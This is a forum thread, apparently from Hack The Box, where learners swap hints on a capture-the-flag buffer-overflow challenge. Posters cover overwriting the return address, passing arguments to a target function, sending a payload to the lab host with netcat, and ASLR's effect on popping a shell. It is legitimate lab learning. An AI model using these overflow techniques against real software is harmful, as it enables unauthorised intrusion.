[pwn] You know 0xDiablos

Just solved this problem. Had the right answer for a while but nc was the thing that was throwing me off. As a tip, if you connect with nc, make sure you hang around long enough to get a response from the server. :wink:

I think i have the correct payload but i just can not get it to work. If anybody would be willing to discuss my idea/sample and nudge me into the right direction it would be very much appreciated.

Hi there.
Any resources to start learning pwning? Or any resources to start learning hiw to solve challenges? It is easier for me to solve machines than challenges. Any info is appreciated.

1 Like

Hi there.
I`ve wrote payload and read file with some text and have segmentaion fault after it.
How i can send my payload to docker.hackthebox.eu port:32133
Then i use nc I dont have any answer. It because i have segmentation fault?

For those not using pwntools (kinda overkill for this challenge IMO):

(cat payload; echo) | nc docker.hackthebox.eu xxxx
1 Like

Type your comment> @fr0ster said:

Hi there.
I`ve wrote payload and read file with some text and have segmentaion fault after it.
How i can send my payload to docker.hackthebox.eu port:32133
Then i use nc I dont have any answer. It because i have segmentation fault?

I forgot add ‘\n’ into payload. All works.

Type your comment> @lamorim said:

I’m stuck here as well. I created a payload that overrides ESP with the function I want to jump to address and got this when running locally:

“Hurry up and try in on server side.”

When I tried it on the instance, it just disconnects. am I missing something silly here?

I’m exactly at this point and I don’t know how to fix this. I have read posts above mentioning how to send this payload via netcat, but it just won’t work.

I have created a payload. When running:
(cat payload; echo) | ./vuln
the “Hurry up…” message is returned.
Yet when I try this on the server:
(cat payload; echo) | nc docker.hackthebox.eu xxxx
I get nothing :frowning:

If anybody could give another hint, I’d be grateful :slight_smile:

@mrtn82 disassemble the function where you are jumping to see what’s going on, It’s not just jumping there.

How do you figure out the return address of the remote binary without a format string vuln, i’m missing something simple here?

There is no position independent code, so the main binary will always be loaded at the same address. However, ASLR will affect shared libraries and stack location.

got it, if someone need help, feel free to PM me

could someone please explain me where did these Zeros after the return address and after the Parameters come ???

0xfff0a90c: 0x41414141 0x41414141 0x41414141 0x41414141
0xfff0a91c: 0x080491e2 0x00000000 0x21524111 0x00000000
0xfff0a92c: 0x3f212ff3 0x00000000 0x00000000 0x00000000

got it!
really good for beginners like me :slight_smile:

I got the flag, but it is possible to pop a shell?

Yoo can anyone give me a nudge in the right direction? I am in the process of trying to bof the first function but can’t seem to get the return address to point to the function I need and even if I did I don’t know how I would pass in the required arguments

I’m struggling. I’m new to exploiting BOF’s so I’d appreciate any nudges or hints. I’ve managed to get “Hurry up and try in on server side.” when running it locally and I can set the payload to return to main on the server. I just don’t understand how I’m supposed to call the function and pass the two params it’s asking for.

Hello to all , this is my first post in the forum, i need just a small nudge on one things… i was able to find the second function to which i need to jump , however i cant figure out how to pass the required arguments… Please PM me if you can.

Hello, for anyone solve this challenge, can I ask some help please? Im new to assembly, my question is how to calculate the buffer in the sym.vuln function? Many thanks!

I’ve posted on RE stackexchange, you can give me a reply in there?

https://reverseengineering.stackexchange.com/questions/25642/variable-size-in-assembly-calculation

Type your comment> @l00zectrl said:

Yoo can anyone give me a nudge in the right direction? I am in the process of trying to bof the first function but can’t seem to get the return address to point to the function I need and even if I did I don’t know how I would pass in the required arguments

in the debugger, in the vuln() function, you must put a breakpoint immediately after the gets() function and step by step until the ret instruction. look at the $eip register at the step before the execution of the ret instruction - this will be the return address. It will point to the next line in the main function, this is the address you need to overwrite

Type your comment> @wazKoo said:

Anyone able to get shell via shellcode or rop system(/bin/sh) ?

It seems to me that this is impossible - we do not know at what address the libc.so library is loaded on the docker instance